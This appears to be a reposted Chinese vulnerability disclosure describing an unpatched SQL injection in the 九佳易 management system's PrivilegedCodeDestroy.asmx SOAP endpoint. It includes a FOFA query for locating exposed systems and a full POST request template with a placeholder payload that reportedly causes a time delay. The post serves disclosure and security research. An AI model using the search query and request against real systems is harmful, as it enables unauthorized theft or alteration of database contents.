文章总结： 文档披露九佳易管理系统PrivilegedCodeDestroy.asmx接口存在SQL注入漏洞，起因是接口未对客户端传入参数进行严格校验。攻击者可通过构造恶意SQL片段窃取或篡改数据。文中给出了FOFA搜索语法及基于SOAP协议的延时注入POC，验证了漏洞有效性，建议受影响用户尽快进行安全排查与修复。 综合评分： 70 文章分类： 漏洞分析,漏洞POC,WEB安全

【0day】九佳易管理系统 PrivilegedCodeDestroy.asmx SQL注入漏洞

0day收割机

2026年3月1日 17:27 山东

漏洞简介

九佳易系统管理系统中的 PrivilegedCodeDestroy.asmx 通用处理程序接口存在SQL注入漏洞，该接口主要用于处理前端 AJAX 请求并与后端数据库进行交互。由于接口未对客户端传入的关键参数进行严格的输入校验、参数化处理或特殊字符转义，攻击者可通过构造恶意的 SQL 语句片段注入到请求参数中，使后端数据库执行非授权的 SQL 操作，进而窃取、篡改甚至销毁数据库中的敏感数据。

影响版本

fofa语法

title=”VSQL” && body=”/Scripts/Login_A8/”

漏洞复现

因为参数获取是通过this.Request["hyh"]的方式，因此支持get、post等常规方式外，还支持multipart格式

POST /Interface/licx/PrivilegedCodeDestroy.asmx HTTP/1.1
SOAPAction: http://tempuri.org/UpdatePrivilegedState
Content-Type: text/xml;charset=UTF-8
Host:

<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope" xmlns:tem="http://tempuri.org/">
&nbsp; &nbsp;<soap:Header/>
&nbsp; &nbsp;<soap:Body>
&nbsp; &nbsp; &nbsp; <tem:UpdatePrivilegedState>
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<!--type: string-->
&nbsp; &nbsp; &nbsp; &nbsp; &nbsp;<tem:code>SQLI_POC</tem:code>
&nbsp; &nbsp; &nbsp; </tem:UpdatePrivilegedState>
&nbsp; &nbsp;</soap:Body>
</soap:Envelope>

成功延时 5 秒。

仅供安全研究和学习使用。若因传播、利用本文档信息而产生任何直接或间接的后果或损害，均由使用者自行承担，文章作者不为此承担任何责任。

免责声明：

本文所载程序、技术方法仅面向合法合规的安全研究与教学场景，旨在提升网络安全防护能力，具有明确的技术研究属性。

任何单位或个人未经授权，将本文内容用于攻击、破坏等非法用途的，由此引发的全部法律责任、民事赔偿及连带责任，均由行为人独立承担，本站不承担任何连带责任。

本站内容均为技术交流与知识分享目的发布，若存在版权侵权或其他异议，请通过邮件联系处理，具体联系方式可点击页面上方的联系我。

本文转载自：0day收割机 《【0day】九佳易管理系统 PrivilegedCodeDestroy.asmx SQL注入漏洞》